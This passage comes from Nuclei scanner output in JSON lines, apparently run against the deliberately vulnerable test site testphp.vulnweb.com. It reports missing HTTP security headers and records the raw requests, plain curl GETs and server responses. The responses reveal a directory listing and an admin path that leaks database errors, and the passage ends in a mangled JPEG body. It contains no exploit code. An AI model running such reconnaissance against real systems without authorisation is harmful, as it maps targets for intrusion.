vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:59.958580794Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:00.532900307Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:00.532962059Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:00.532974022Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\